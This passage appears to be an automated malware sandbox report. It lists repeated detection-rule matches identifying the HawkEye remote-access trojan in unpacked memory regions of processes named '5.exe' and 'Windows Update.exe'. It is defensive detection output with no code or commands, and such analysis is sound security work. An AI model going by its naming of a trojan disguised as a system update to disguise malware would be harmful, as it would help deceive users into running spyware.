          Source: 2.2.5.exe.4a07e2d.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.2.5.exe.4a07e2d.10.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.Windows Update.exe.4a57e0d.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.2.Windows Update.exe.4a57e0d.13.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.5.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.0.5.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.4ae8208.35.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.4ae8208.35.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.Windows Update.exe.4ae9c0d.19.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.2.Windows Update.exe.4ae9c0d.19.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.5.exe.4a97e0d.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.2.5.exe.4a97e0d.11.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.Windows Update.exe.4b3fa72.17.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.2.Windows Update.exe.4b3fa72.17.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.38c3258.47.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.38c3258.47.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.4a50000.52.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.4a50000.52.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.5.exe.148b1458.4.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 1.2.5.exe.148b1458.4.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.5.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.0.5.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.Windows Update.exe.147b1458.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 6.2.Windows Update.exe.147b1458.4.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.5.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.2.5.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.5.exe.4a06428.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.2.5.exe.4a06428.8.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.5.exe.148b1458.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 1.2.5.exe.148b1458.4.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.415058.18.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.415058.18.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.5.exe.41ce65.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.2.5.exe.41ce65.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.5.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.0.5.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.1.Windows Update.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.1.Windows Update.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.Windows Update.exe.38c3258.7.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.2.Windows Update.exe.38c3258.7.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.5.exe.3863258.6.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.2.5.exe.3863258.6.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.4a26c92.50.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.4a26c92.50.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.4a57e0d.29.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.4a57e0d.29.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.400000.19.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.400000.19.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.4a56408.54.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.4a56408.54.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.49cf428.28.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.49cf428.28.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.5.exe.4a90000.12.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.2.5.exe.4a90000.12.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.4a50000.30.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.4a50000.30.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.Windows Update.exe.415058.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.2.Windows Update.exe.415058.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.Windows Update.exe.4a50000.15.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.2.Windows Update.exe.4a50000.15.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.415058.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.415058.12.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.Windows Update.exe.4aadc72.14.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.2.Windows Update.exe.4aadc72.14.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.5.exe.415058.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.0.5.exe.415058.12.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.5.exe.3863258.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.2.5.exe.3863258.6.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.Windows Update.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.2.Windows Update.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.41b460.20.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.41b460.20.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.41ce65.17.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.41ce65.17.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.38c9660.23.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.38c9660.23.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.5.exe.415058.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.1.5.exe.415058.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.5.exe.41ce65.15.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.0.5.exe.41ce65.15.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.38cb065.24.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.38cb065.24.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.Windows Update.exe.415058.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.2.Windows Update.exe.415058.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.5.exe.148b9265.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 1.2.5.exe.148b9265.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.5.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.0.5.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.Windows Update.exe.49cf428.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.2.Windows Update.exe.49cf428.11.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.41b460.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.41b460.10.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.Windows Update.exe.41b460.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.2.Windows Update.exe.41b460.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.4b3fa72.36.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.4b3fa72.36.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.5.exe.4b7fa72.16.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.2.5.exe.4b7fa72.16.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.5.exe.386b065.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.2.5.exe.386b065.7.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.4a50000.30.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.4a50000.30.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.415058.41.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.415058.41.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.5.exe.4aedc72.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.2.5.exe.4aedc72.13.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.Windows Update.exe.147a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 6.2.Windows Update.exe.147a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.38c3258.25.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.38c3258.25.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.5.exe.3869660.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.2.5.exe.3869660.5.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.4ae0000.33.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.4ae0000.33.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.5.exe.148a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 1.2.5.exe.148a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.49d0e2d.49.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.49d0e2d.49.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.1.Windows Update.exe.41ce65.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.1.Windows Update.exe.41ce65.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.38c9660.45.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.38c9660.45.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.Windows Update.exe.147b1458.4.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 6.2.Windows Update.exe.147b1458.4.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.4a26c92.27.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.4a26c92.27.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.5.exe.148b7860.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 1.2.5.exe.148b7860.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.4ae9c0d.57.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.4ae9c0d.57.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.41ce65.15.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.41ce65.15.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.5.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.0.5.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.1.Windows Update.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.1.Windows Update.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.5.exe.148a0000.1.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 1.2.5.exe.148a0000.1.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.Windows Update.exe.38cb065.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.2.Windows Update.exe.38cb065.8.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.41b460.16.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.41b460.16.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.5.exe.415058.16.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.0.5.exe.415058.16.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.400000.19.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.400000.19.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.4aadc72.31.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.4aadc72.31.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.Windows Update.exe.4ae0000.16.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.2.Windows Update.exe.4ae0000.16.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.Windows Update.exe.49d0e2d.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.2.Windows Update.exe.49d0e2d.10.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.1.Windows Update.exe.41b460.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.1.Windows Update.exe.41b460.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.5.exe.41ce65.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.1.5.exe.41ce65.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.415058.14.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.415058.14.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.Windows Update.exe.147b9265.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 6.2.Windows Update.exe.147b9265.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.4ae0000.55.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.4ae0000.55.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.41ce65.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.41ce65.11.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.5.exe.4b20000.15.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.2.5.exe.4b20000.15.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.415058.14.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.415058.14.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.1.Windows Update.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.1.Windows Update.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.4ae8208.58.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.4ae8208.58.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.Windows Update.exe.4ae8208.18.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.2.Windows Update.exe.4ae8208.18.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.1.5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.400000.40.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.400000.40.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.Windows Update.exe.147b7860.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 6.2.Windows Update.exe.147b7860.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.Windows Update.exe.4a56408.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.2.Windows Update.exe.4a56408.12.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.5.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.2.5.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.415058.41.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
